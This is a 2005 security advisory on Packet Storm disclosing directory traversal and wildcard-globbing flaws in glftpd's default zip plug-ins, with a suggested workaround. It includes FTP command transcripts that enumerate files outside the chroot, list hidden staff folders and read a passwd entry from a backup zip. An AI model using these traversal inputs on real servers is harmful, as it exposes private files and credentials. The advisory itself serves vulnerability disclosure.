glftpd.txt

2005-02-25T00:00:00
ID PACKETSTORM:36221
Type packetstorm
Reporter Paul Craig
Modified 2005-02-25T00:00:00

Description

                                        
                                            ` Pimp industries.  
"Its all about the Bling, B^!%@s and Fame!"  
  
Multiple vulnerabilities in Glftpd v1.26 - v2.00 default zip based plug-ins  
: sitenfo.sh, sitezipchk.sh, siteziplist.sh  
  
(C) Paul Craig - Pimp Industries 2005  
  
  
Background  
-------------  
glftpd is an open source ftp server used by the more 'hardcore' of ftp  
servers :) (www.glftpd.com)  
  
  
Exploit:  
-------------  
The exploit is not in glftpd itself, instead inside a suite of zip based  
plug-ins that come with the glftpd package by default, these plug-ins are  
widely used in installations of glftpd.  
This advisory will focus on the plugin sitenfo.sh, a script to allow users  
to read .nfo and .diz files from within zip archives("SITE NFO" by  
default). Although the exploits are synonymous with all the .sh scripts  
listed above.  
  
Due to improper input validation several flaws exist in the script that  
can allow for unprivileged access to files within the glftpd chroot and  
information disclosure of private files  
  
Firstly.  
Directory transversal to prove the existence of a valid file outside of  
the ftp siteroot:  
  
ftp> site nfo ../etc/grouap  
200- dn's NFO Lister v1.00  
200-  
200- That zipfile (../etc/grouap) does not exist!  
200 Error executing command.  
ftp> site nfo ../etc/group  
200- dn's NFO Lister v1.00  
200-  
200- nfo(s) from ../etc/group:  
200-  
200 Command Successful.  
  
Here we determine that the file ../etc/group exists, a file outside of the  
default FTP site root.  
  
Secondly.  
Directory transversal globbing attack:  
Due to improper parsing of *, a user can return the first two files in any  
directory ($1 $2), including files within 'private' or hidden directory's  
such as the 'staff' folder.  
  
ftp> site nfo ../../../../../etc/*  
200- dn's NFO Lister v1.00  
200-  
200- ../../../../../etc/group from ../../../../../etc/ftpd-dsa.pem:  
  
and to view inside private folders within the ftp root (that usually you  
are unable to see)  
  
ftp> site nfo staff/*  
200- dn's NFO Lister v1.00  
200-  
200- staff/Mark from staff/Peter:  
200- Command Successful.  
ftp> cd staff  
200- No such file or directory.  
  
Here we can see that staff/Mark and staff/Peter exist, although we are  
unable to even see the directory staff/ by default, since we have no  
access.  
  
This can be further exploited to build a full directory tree by using  
guided wildcards within the globbed request, such as.  
site nfo ../../../../../etc/a*  
site nfo ../../../../../etc/b*  
site nfo ../../../../../etc/c*  
  
And so on and so forth to list all valid files and directories.  
  
Finally you can use the script to also view any file inside any zipfile  
within the glftp root, such as backups or zipfiles in private directories.  
  
First, we find a zip file.  
  
ftp> site nfo ../../*.zip  
200- dn's NFO Lister v1.00  
200-  
200- nfo(s) from ../../backup.zip:  
  
backup.zip exists outside the glftpd site root and is returned in $1 to  
sitenfo.sh  
  
Now we will read all files within backup.zip that begin wtih 'p'  
ftp> site nfo ../../backup.zip p*  
200- dn's NFO Lister v1.00  
200-  
200- passwd from ../../backup.zip:  
200-  
glftpd:$c8aa2099$89be575337e36892c6d7f4181cad175d685162ad:0:0:0:/site:/bin/false  
  
This will of cause only work for zip compressed files, not gzip files.  
  
Combined, these flaws allow a user to browse the glftp chrooted  
environment and then read any file inside any zip file. Considering zip  
files may contain sensitive information such as backups or private  
documents, this exploit could easily lead to further privilege escalation.  
  
sitezipchk.sh and siteziplist.sh both contain similar exploits, although I  
have noticed sitenfo.sh is more frequently used in glftpd sites.  
  
Suggestions/Work Around:  
-------------  
  
Easy solution is to remove sitenfo.sh, siteziplist.sh and sitezipchk.sh  
from the /bin directory, passing user supplied arguments to shell is never  
bright and is not worth the security risk.  
  
  
Company status  
---------------  
Pimp Industries is a privately owned New Zealand based security research  
company.  
If you would like to contact Pimp Industries to discuss any nature of  
business, please email us at headpimp at pimp-industries.com.  
  
  
Personal Pimp Hello's fly to:  
-------------------  
The boys at security-assessment.com, pinky, sozni, and you! yes, you!  
  
Paul Craig  
Head Pimp, Security Researcher  
Pimp Industries  
"Move fast, think faster"  
  
  
`